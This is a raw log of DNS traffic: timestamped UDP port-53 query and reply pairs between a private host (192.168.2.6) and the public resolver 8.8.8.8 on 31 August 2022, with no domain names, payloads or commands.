Aug 31, 2022 23:48:50.163110971 CEST	53	54904	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.163892984 CEST	54905	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:50.183588028 CEST	53	54905	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.247066021 CEST	54906	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:50.266885042 CEST	53	54906	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.267487049 CEST	54907	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:50.285155058 CEST	53	54907	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:50.285778999 CEST	54908	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:50.305613995 CEST	53	54908	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:53.708446980 CEST	53	54903	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:54.912518978 CEST	51530	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:54.940237045 CEST	53	51530	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:54.986932039 CEST	51531	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:55.005909920 CEST	53	51531	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:55.006742954 CEST	51532	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:55.024481058 CEST	53	51532	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:55.025305033 CEST	51533	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:55.044683933 CEST	53	51533	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:55.046077967 CEST	51534	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:55.065548897 CEST	53	51534	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:55.066318035 CEST	51535	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:55.085766077 CEST	53	51535	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:56.292723894 CEST	56122	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.294055939 CEST	56122	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.871090889 CEST	53	56122	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:57.923278093 CEST	56123	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.940429926 CEST	53	56123	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:57.941241026 CEST	56124	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.961014986 CEST	53	56124	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:57.961649895 CEST	56125	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.979434013 CEST	53	56125	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:57.979980946 CEST	56126	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:57.997720003 CEST	53	56126	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:58.002645016 CEST	56127	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:58.020783901 CEST	53	56127	8.8.8.8	192.168.2.6
Aug 31, 2022 23:48:59.203073978 CEST	52556	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:48:59.563860893 CEST	53	56122	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.248944044 CEST	52556	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.778501987 CEST	53	52556	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.827044010 CEST	61610	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.846194029 CEST	53	61610	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.850075960 CEST	61611	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.870034933 CEST	53	61611	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.891035080 CEST	61612	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.910629988 CEST	53	61612	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.911463022 CEST	61613	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.930983067 CEST	53	61613	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:00.931788921 CEST	61614	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:00.951646090 CEST	53	61614	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:01.369014978 CEST	53	52556	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.198327065 CEST	52481	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.226392031 CEST	53	52481	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.264911890 CEST	52482	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.283921003 CEST	53	52482	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.284759998 CEST	52483	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.302268028 CEST	53	52483	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.302880049 CEST	52484	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.320642948 CEST	53	52484	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.321191072 CEST	52485	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.338948965 CEST	53	52485	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:02.339569092 CEST	52486	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:02.359249115 CEST	53	52486	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:03.829682112 CEST	53943	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:03.865678072 CEST	53	53943	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:03.922105074 CEST	53944	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:03.939187050 CEST	53	53944	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:03.940196037 CEST	53945	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:03.958033085 CEST	53	53945	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:03.959032059 CEST	53946	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:03.978843927 CEST	53	53946	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:03.979773998 CEST	53947	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:03.997428894 CEST	53	53947	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:04.012398005 CEST	53948	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:04.032171965 CEST	53	53948	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:05.030595064 CEST	56086	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.028855085 CEST	56086	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.064717054 CEST	53	56086	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.098314047 CEST	56087	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.117698908 CEST	53	56087	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.118498087 CEST	56088	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.138461113 CEST	53	56088	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.139177084 CEST	56089	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.157145977 CEST	53	56089	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.157622099 CEST	56090	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.177340984 CEST	53	56090	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.177939892 CEST	56091	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:06.195765972 CEST	53	56091	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:06.744250059 CEST	53	56086	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:07.180340052 CEST	56547	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.172979116 CEST	56547	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.292459011 CEST	53	56547	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.337205887 CEST	56548	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.356190920 CEST	53	56548	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.357395887 CEST	56549	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.376708031 CEST	53	56549	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.378525019 CEST	56550	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.397835970 CEST	53	56550	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.399945974 CEST	56551	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.418164968 CEST	53	56551	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.420766115 CEST	56552	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:08.440345049 CEST	53	56552	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:08.824318886 CEST	53	56547	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:11.635112047 CEST	59881	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:12.929991007 CEST	59881	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.306567907 CEST	53	59881	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:13.344588995 CEST	59882	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.364543915 CEST	53	59882	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:13.365736008 CEST	59883	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.386758089 CEST	53	59883	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:13.387386084 CEST	59884	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.407160044 CEST	53	59884	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:13.407922029 CEST	59885	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.427547932 CEST	53	59885	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:13.428276062 CEST	59886	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:13.445738077 CEST	53	59886	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:14.049354076 CEST	53	59881	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:14.604439974 CEST	58917	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.610282898 CEST	58917	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.732141018 CEST	53	58917	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:15.762787104 CEST	58918	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.786143064 CEST	53	58918	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:15.787075996 CEST	58919	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.810261011 CEST	53	58919	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:15.820662022 CEST	58920	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.845424891 CEST	53	58920	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:15.846000910 CEST	58921	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.871382952 CEST	53	58921	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:15.872216940 CEST	58922	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:15.897437096 CEST	53	58922	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:16.308988094 CEST	53	58917	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.166126013 CEST	50343	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.240441084 CEST	53	50343	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.297399998 CEST	50344	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.314428091 CEST	53	50344	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.315310955 CEST	50345	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.335490942 CEST	53	50345	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.336642981 CEST	50346	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.354706049 CEST	53	50346	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.355597019 CEST	50347	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.375117064 CEST	53	50347	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:17.376161098 CEST	50348	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:17.394150019 CEST	53	50348	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:18.439655066 CEST	62520	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.436444044 CEST	62520	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.552881956 CEST	53	62520	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.605516911 CEST	55630	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.624495029 CEST	53	55630	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.625741959 CEST	55631	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.646193027 CEST	53	55631	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.646852970 CEST	55632	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.666341066 CEST	53	55632	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.667081118 CEST	55633	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.686774969 CEST	53	55633	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.687489033 CEST	55634	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:19.706923962 CEST	53	55634	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:19.966856956 CEST	53	62520	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:20.744438887 CEST	52079	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.322283030 CEST	53	52079	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:21.364559889 CEST	56570	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.388284922 CEST	53	56570	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:21.389710903 CEST	56571	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.409245014 CEST	53	56571	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:21.410257101 CEST	56572	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.428335905 CEST	53	56572	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:21.437589884 CEST	56573	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.460988045 CEST	53	56573	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:21.461711884 CEST	56574	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:21.481684923 CEST	53	56574	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.729974031 CEST	49232	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.802742958 CEST	53	49232	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.828344107 CEST	49233	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.845546007 CEST	53	49233	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.846611977 CEST	49234	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.864109993 CEST	53	49234	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.865636110 CEST	49235	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.885181904 CEST	53	49235	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.885858059 CEST	49236	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.905694008 CEST	53	49236	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:22.906522989 CEST	49237	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:22.924313068 CEST	53	49237	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.181659937 CEST	56123	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.794177055 CEST	53	56123	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.843636036 CEST	56124	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.862725973 CEST	53	56124	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.863671064 CEST	56125	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.881535053 CEST	53	56125	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.882021904 CEST	56126	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.900017977 CEST	53	56126	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.900788069 CEST	56127	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.918819904 CEST	53	56127	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:24.926548004 CEST	56128	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:24.944628000 CEST	53	56128	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.173096895 CEST	52865	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.704699039 CEST	53	52865	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.742422104 CEST	52866	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.762280941 CEST	53	52866	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.766419888 CEST	52867	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.786171913 CEST	53	52867	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.794256926 CEST	52868	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.815588951 CEST	53	52868	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.819000959 CEST	52869	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.840948105 CEST	53	52869	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:26.845475912 CEST	52870	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:26.868755102 CEST	53	52870	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:32.760355949 CEST	57322	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:33.801712990 CEST	57322	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:33.918472052 CEST	53	57322	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:33.948062897 CEST	57323	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:33.965091944 CEST	53	57323	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:33.965954065 CEST	57324	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:33.985773087 CEST	53	57324	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:33.986495972 CEST	57325	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:34.008980036 CEST	53	57325	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:34.009679079 CEST	57326	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:34.029289961 CEST	53	57326	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:34.029794931 CEST	57327	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:34.047578096 CEST	53	57327	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:34.840379000 CEST	53	57322	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:35.228359938 CEST	62958	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:36.246831894 CEST	62958	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.234587908 CEST	62958	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.368525028 CEST	53	62958	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.414644003 CEST	64405	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.434192896 CEST	53	64405	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.435153961 CEST	64406	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.455080986 CEST	53	64406	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.460208893 CEST	64407	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.479908943 CEST	53	64407	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.493947983 CEST	64408	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.513475895 CEST	53	64408	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.527287960 CEST	64409	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:37.546905994 CEST	53	64409	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:37.804033995 CEST	53	62958	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:38.629677057 CEST	62848	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.158519983 CEST	53	62848	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.190716982 CEST	62849	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.209886074 CEST	53	62849	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.210927963 CEST	62850	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.228986025 CEST	53	62850	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.232388020 CEST	62851	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.250422955 CEST	53	62851	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.251383066 CEST	62852	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.270978928 CEST	53	62852	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.272142887 CEST	62853	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:39.291903973 CEST	53	62853	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:39.578844070 CEST	53	62958	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:40.533377886 CEST	55956	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:41.548500061 CEST	55956	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.563077927 CEST	55956	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.803582907 CEST	53	55956	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:42.830462933 CEST	55957	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.849625111 CEST	53	55957	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:42.850589037 CEST	55958	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.870042086 CEST	53	55958	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:42.870748997 CEST	55959	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.890347004 CEST	53	55959	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:42.892258883 CEST	55960	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.910130978 CEST	53	55960	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:42.910756111 CEST	55961	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:42.930283070 CEST	53	55961	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:43.727183104 CEST	53	55956	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:43.926912069 CEST	57515	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:44.304563046 CEST	53	55956	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:44.985625029 CEST	57515	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:45.985445023 CEST	57515	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.151169062 CEST	53	57515	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:46.167262077 CEST	57516	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.186392069 CEST	53	57516	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:46.187199116 CEST	57517	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.206867933 CEST	53	57517	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:46.207613945 CEST	57518	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.227328062 CEST	53	57518	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:46.227968931 CEST	57519	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.245661020 CEST	53	57519	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:46.246339083 CEST	57520	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:46.263768911 CEST	53	57520	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:47.143296003 CEST	53	57515	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:47.290848970 CEST	51321	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:48.499587059 CEST	51321	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:48.946257114 CEST	53	57515	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:49.671741962 CEST	53	51321	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:49.956358910 CEST	51321	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.028801918 CEST	53	51321	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:50.054864883 CEST	51322	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.072125912 CEST	53	51322	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:50.073091984 CEST	51323	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.094736099 CEST	53	51323	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:50.142801046 CEST	51324	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.160806894 CEST	53	51324	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:50.167078018 CEST	51325	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.185210943 CEST	53	51325	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:50.186178923 CEST	51326	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:50.206547022 CEST	53	51326	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:52.308414936 CEST	53	51321	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:52.769992113 CEST	61089	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.300184965 CEST	53	61089	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.309271097 CEST	61090	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.328352928 CEST	53	61090	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.336150885 CEST	61091	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.353754044 CEST	53	61091	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.354264975 CEST	61092	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.372015953 CEST	53	61092	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.372548103 CEST	61093	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.390347004 CEST	53	61093	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.390899897 CEST	61094	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:53.411127090 CEST	53	61094	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:53.746059895 CEST	62766	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.282331944 CEST	53	62766	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.293313026 CEST	62767	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.312721014 CEST	53	62767	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.327765942 CEST	62768	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.346045017 CEST	53	62768	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.349513054 CEST	62769	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.369218111 CEST	53	62769	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.371674061 CEST	62770	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.389324903 CEST	53	62770	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.397249937 CEST	60131	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.415669918 CEST	53	60131	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.752284050 CEST	62732	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.786828041 CEST	53	62732	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.810272932 CEST	62733	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.827580929 CEST	53	62733	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.828233004 CEST	62734	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.848042965 CEST	53	62734	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.851675987 CEST	62735	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.871623039 CEST	53	62735	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.873826027 CEST	62736	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.893619061 CEST	53	62736	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:54.897558928 CEST	62737	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:54.917089939 CEST	53	62737	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:55.329066992 CEST	60690	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:56.358541012 CEST	60690	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:56.991584063 CEST	53	60690	8.8.8.8	192.168.2.6
